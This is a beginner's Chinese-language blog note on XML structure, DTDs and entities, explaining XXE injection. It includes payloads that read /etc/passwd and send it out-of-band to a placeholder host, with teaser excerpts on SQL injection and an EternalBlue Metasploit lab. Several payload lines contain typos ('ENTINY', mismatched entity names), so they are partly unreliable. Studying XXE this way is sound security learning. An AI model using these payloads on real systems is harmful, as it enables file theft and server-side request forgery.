前言

本文是初学web安全时写的，有许多地方不够严谨，逻辑上也存在问题，请见谅~

XML与HTML的不同

与html区别：html表示与数据相关，XML更多用于数据传输、存储

XML结构

1
2
3

<?xml version="1.0"?>表示版本号，xml处理解析时的规范
<Person>...</Person>表示根元素，XML文档需有且仅有一个根元素
根元素内有两个赋值的嵌套标签子元素<Name></Name>,<Age></Age>

注意：元素标签名对大小写敏感

上述单独字符不能直接出现，会被错误解析

实体（ENTITIY）

ENTITY就像XML中的变量，可以对其进行赋值，在XML文档的其他地方进行引用，实体在XML的文档类型定义部分（DTD）被单独定义描述

XML 文档的根元素通常与 DTD 中定义的根元素名称相匹配

<!DOCTYPE Person [
	<!ENTITY name "XXX">
]>
<Person>
    <Name>&name;</Name>
    <Age>20</Age>
</Person>
前面的DOCTYPE表示这是一个DTD，用ENTITTY定义了一个叫做name的实体，赋值为XXX;后面可以直接用&跟上实体名引用这个实体，可以防止重复赋值

DTD分类

DTD并不是XML文档的一部分，它们总是在根元素的定义之上->DTD像实体一样可以从外部加载

一般实体/通用实体（general entities）

如上面的那个实体

引用外部dtd：

解析器将从这个外部dtd中提取并解析内容

1
2

<!DOCTYPE Pwn SYSTEM "xxx.dtd"> dtd的URI
<Pwn>test</Pwn> 是 XML 文档的根元素，它的名字与 DOCTYPE 声明中的名称相匹配。这意味着 Pwn 是这个 XML 文档的根元素，它包含的文本是 test。

参数实体

必须定义在单独的dtd区域内，参数实体只能在同一个DTD中调用

比如，用一个实体给另外一个实体赋值
1
<!ENTITY % outer <!ENTITY inner "xxx">>
常用于XXE（外部实体注入）

dtd中调用参数实体

参数实体只能在同一个DTD中调用！！！
1
2
3
4
5
6
<?xml version="1.0"?>
<!DOCTYPE Pwn[
<!ENTITY % outer "<!ENTITY inner SYSTEM 'xxx'>">
%outer;
]>
<Pwn>&inner;</Pwn>
XML调用DTD中实体参数的大概流程：XML解释器发现这段代码时，先检查版本；然后发现dtd，这个dtd在xml文档中，可以叫做内联dtd，%开头的是参数实体标志，%outer的值是inner中解析出的东西；调用被赋值的%outer相当于
预定义实体

某些特殊符号的一组预定义数值集，这些特殊符号有可能会破坏XML结构（报错），可以选择用其他形式比如十六进制表示这类符号
1
<test><</test> 这一串十六进制表示了<

XML安全性问题

ENTITY
实体可以被赋值（存储数据），但是实体功能不止这个，外部实体就是其中一个功能。

实体不仅能用来存储指定数值，还可以从本地文件或远程网络中调取相关数据，作为后续实体引用，但是这样带来了广泛的攻击面

比如：
1
2
3
4
5
6
<?xml version="1.0"?>
<!DOCTYPE XXE[
<!ENTITY subcribe SYSTEM "secret.txt">
]>

<pwn>&subscribe;</pwn>
SYSTEM表示后面的内容是外部实体；

如果外部实体长得是标签或者和XML很像的东西，XML解析器会报错；

这样的实体赋值并不是secret.txt，而是其中的内容，XML在此接收任意有效的URI包括文件，HTTP，ftp和其他协议形式的内容

外部实体读取了数据，这种就是外部实体注入攻击（XXE）

外部实体注入攻击（XXE）
分类
带内数据
上面的示例涉及的就是带内XXE；

XML解析后的输出会直接显示在屏幕上

基于错误
解析结果只有错误信息（类似Blind XXE）

带外数据
OOB；真正的盲注，XML解析后无任何输出响应（无回显），必须执行一些带外请求把目标数据提取出来

场景：

有一个能解析XML但是没有任何输出响应的web应用，为了测试这种盲注XXE，我们可以用非文件路径的外部实体来请求这里的web应用，可以用dns平台监听web应用是否解析了XML，也可以用自己构造好的网站（SYSTEM后的外部实体URL为测试的地方）

如果监听到了，就说明XML被成功解析，目标web应用正在尝试获取我们构造的网站上的资源作为外部实体，这样我们可以利用受害者的身份发起请求（服务器端请求伪造（SSRF））

Payload

eg：

<?xml version="1.0"?>
<!DOCTYPE XXE[
<!ENTINY %passwd SYSTEM "/etc/passwd">
<!ENTINY %wrapper "<!ENTINY send SYSTEM 'http://xxx.com/?passwd;'>">
%wrapper;
]>
<pwn>send;</pwn>

XML解释器会先解析/etc/passwd的内容赋值到参数实体%passwd中，然后解析URL中的内容赋给实体send，send再赋给参数实体%wrapper

但是这样会报错，根据xml规范， dtd内部子集的参数实体调用不能在实际的标记语言（html，svg等）中来调用参数实体，但是可以在同级别中被当作标记语言调用，外部参数实体不受此限制，可以借助外部dtd绕过这个限制

比如payload形式为：

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "/xxx/xx/x/test.dtd">;

<data>&send;</data> 
莫名冒出来的send实体就来自外部的dtd

%passwd最终会变成URL的一部分

Web安全 XXE && XML

相关推荐

2024-06-02

SQL注入学习笔记

前言本文是初学web安全时写的，有许多地方不够严谨，逻辑上也存在问题，请见谅~ SQL注入当客户端提交的数据未作处理或转义，直接带入数据库具体来说，当Web应用程序对用户输入数据的合理性没有进行判断时，前端传入后端的参数就可能被攻击者所控制，并且根据这些参数带入数据库查询。攻击者可以通过构造不同的SQL语句来对数据库进行任意查询、增加、删除或修改等操作——->(通过构造一条精巧的语句来查询想要得到的信息 ) 分类按照查询字段字符型：当输入的参数为字符串时，称为字符型数字型：当输入的参数为整形时，可以认为是数字型注入按照注入方法 Union注入(联合注入) 报错注入布尔注入时间注入注入点是可以实行注入的地方，通常是一个访问数据库的连接比如 1http://2.0.0.1/sql/Less-1/index.php?id= //id这个地方就是一个注入点判断字符型注入和数字型注入数字型一般提交内容为数字，但是数字不一定为数字型 1.使用and 1=1 和 and 1=2来判断如果提交and 1=1 和 and...

2025-01-27

php反序列化漏洞

反序列化漏洞成因：反序列化unserialize()中接收的字符串可控，通过更改字符串得到想要的对象 php面向对象基础知识php中类和对象的写法1234567891011121314151617181920212223242526272829303132class Test{ var $name;//不推荐用var修饰，可以用public,private,protected修饰（与java一致） var $id; function __construct($name = null,$id = null){//构造函数 $this->name = $name; $this->id = $id; }}class Test{ var $name; var $id; function __construct($name = null,$id = null){ $this->name = $name; $this->id = $id; }}$a = new...

2024-10-14

任意文件下载漏洞学习笔记

前言本文是初学web安全时写的，有许多地方不够严谨，逻辑上也存在问题，请见谅~ 参考：https://blog.csdn.net/qq_43531669/article/details/116865660 什么是任意文件下载/读取？任意文件读取/下载漏洞（Arbitrary File Read/Download Vulnerability），是指攻击者可以通过某些漏洞，绕过应用程序的限制，直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞，从而读取或下载他们本来无权访问的文件，如密码、私钥、证书等，会提供攻击者更多可用信息，提高被入侵的风险。这里以 Pikachu 靶场的 unsafe filedownload...

永恒之蓝漏洞 SMB协议用于共享文件夹添加用户test2(win下): 1net user test2 123456 /add 将用户加入管理员组: 1net localgroup administrators test2 /add 添加成功创建一个文件夹用于共享访问共享文件夹:Win+R，输入 \\ip-address\path 在虚拟机中尝试访问：查看445端口占用情况： 1netstat -ano | grep 445 靶场中漏洞利用拓扑图打开msfconsole 12msfconsole -q# -q表示不输出信息不使用-q 使用-q 扫描永恒之蓝漏洞搜索永恒之蓝漏洞ms17-010 1search ms17-010 使用扫描工具 12use 3# 也可以打全称设置远程主机的ip并执行 12set RHOSTS 192.168.2.169run 利用永恒之蓝漏洞利用永恒之蓝漏洞进行攻击，这里我们使用第0个工具 1use 0 注意这里defaulting...

前言

XML与HTML的不同

XML结构

实体（ENTITIY）

DTD分类

XML安全性问题

ENTITY

外部实体注入攻击（XXE）

分类

带内数据

基于错误

带外数据

Payload